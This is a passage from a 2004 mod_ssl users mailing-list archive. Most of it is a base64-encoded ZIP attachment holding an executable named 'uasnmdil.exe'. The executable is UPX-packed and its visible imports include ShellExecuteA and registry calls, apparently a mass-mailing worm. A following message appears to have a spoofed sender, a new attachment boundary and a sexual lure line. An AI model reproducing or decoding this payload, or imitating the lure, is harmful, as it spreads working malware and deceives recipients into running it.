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
EMWA////3wYwETAeMCYwLDBGMEwwXDATMR4xJDFONcc14DUi/////zYwNk82LzlJOVQ5ZTmB
OYo5rTm+Occ54DnvOfo5Azoh////5To4Ol06aDqJOqk6yzrvOhw7Lzs+O1c7XDthO/f///+F
O507wDtLPF48aDwvPTk9Qz1IPWs9iD2XPaE9eF8g2CKGWEcLMoYy/////6EyqjK1Mt4y5DLs
MgkzTTOiM9Iz5TPrMxA0/zQYNco1/////+41mzY1N1k3vDfON9o3DjgrOKc4FjmaO7U8vjzd
PMA930Tz/w8+HD5VPqc+9j4DPzgSzzDVMN/////dMO3PQjGBMaYxsTG6Mcsx0DH+MQ8yKDJ0
NH80jP////803zTuNBE1IzU/NXs1yTWsNrc2wDbONtQ25zb5NiE3J3/3//83MDc5N043ZTdw
N5A3qTevN8M3z3/9NyE4YzjZ/3/D/zj1OAA5CzkdOSofxjlQOnk6izqfOq46ATsH/////zsW
O2c7bDtyO307mzupO8M75jv2OwE8Mjw4PD48RDxK//8N/zxQPFY8XDxiGW48dDx6PIA8hjyM
PJI8mDye/////zykPKo8sDy2PLw8wjzIPM481DzaPOA85jzsPPI8+Dz+///W/zwEPQo9ED0W
PRyWPSg9Lj00PTo9QD1GPUw9fotb/FI9WD1ePRpqPSV2PXw9gv///xttjj2UPZo9oD2mPaw9
sj24Pb49xD3KPdA91j1AauH/3D3iPeg97j30PfqPPh1VkbAIDW6ghIL/gAPf/SH/lev+itGK
kNlflYPZ2gctqoLZ0AJ3KDD3B9giIYT3fT68F0Ao95QDnKY0FPcRIBR8NoUwF2KyAGR0ByD3
dAwoBjdAshwgGKhXEAoCSQz3TNkscmgB63rgs9kgFKciECOUJISCBKcRATYI6GTB4L1gCX7P
CSBgwbKldyAhwbIhu2AmOJCmc4EYYVZqqYh2gDArBXZespwQ0hCbKriy3bQXwhALs5ZV8MDB
pAHcKmAjI2HWCNSOBaAJN4vXoupT4Aj+s+tf3YH6sP8W6NOXK+g/ALe7Ox6jZBEJ6yQOHoM9
NncheA2//zUIIBQgAO9txwUKmScCuVQu1V+sEJv4jIsQ3+4wGu8yMRFUBv87MUYxWjFgMQda
p0CI4lxkFfSCZM0IMycuwEix7mRtX2N5VyMVYNQb4ssBxggqOKKIJEVaFoIJjN0YAQUbxSsG
sW5Q3WMvJG5lQRBFeGkUZEDdviD3Ek0OdWxo2VbxyE7rQRM6itmsWBHzQSgHVaAiQEHNDpCA
ATPqQS2b1g7TomZRJwKKTRjUQA7fAZFBjUHLAbJkUMneAbcMeRNCAbMKRgHss2FQjAltcGkK
bhjUO3Cnk3t+SygV0QrkaW8TCnjvUHlDbGFnvUQlO1HjDQZLFvXjAfJ8SVrQVuRB3ExIBGqM
AhgBMAhVsm5SlHRjc7olVEcB0QxvAIkK1qkKhbOwBGoB9u+Z1EigTghyAYFaCLbTEKjTbDam
ADGhOs02F7Kc5dmMGJE5AQuSiGWzyfTMLM8D+QQAQg8BDmCiXECOXhQqA5AvEsS5bwAEoPm6
qE9kOpAD1SFqtwJXqADEkHJyKs4MDkLU965sG/sGxCwPGckS9FQwownJslIYc8wdQtRsAOvE
an8ovpUnG7TGc5IAAAAAAAAAgAQA/wAAAAAAAAAAYL4AgEAAjb4AkP//V4PN/+sQkJCQkJCQ
igZGiAdHAdt1B4seg+78Edty7bgBAAAAAdt1B4seg+78EdsRwAHbc+91CYseg+78Edtz5DHJ
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAAAgQmEw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAdWFzbm1kaWwuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------myuwovufpdsnejbxvsvk--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 14:39:36 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88FFAA8A4F; Mon,  1 Mar 2004 14:39:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from MASTER-XP (dhpontecorvo2.roma1.infn.it [141.108.28.100])
	by master.modssl.org (Postfix) with SMTP id 6F921A8A4B
	for ; Mon,  1 Mar 2004 14:39:35 +0100 (CET)
Date: Mon, 01 Mar 2004 14:40:17 +0100
To: modssl-users@modssl.org
Subject: Audra
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hgiopfthhhnvkhriqiby"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hgiopfthhhnvkhriqiby
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Nice friends, nice men, nice sex and feeling great. I don't mind the odd bout of cybersex as I love to use my imagination when I masterbate.
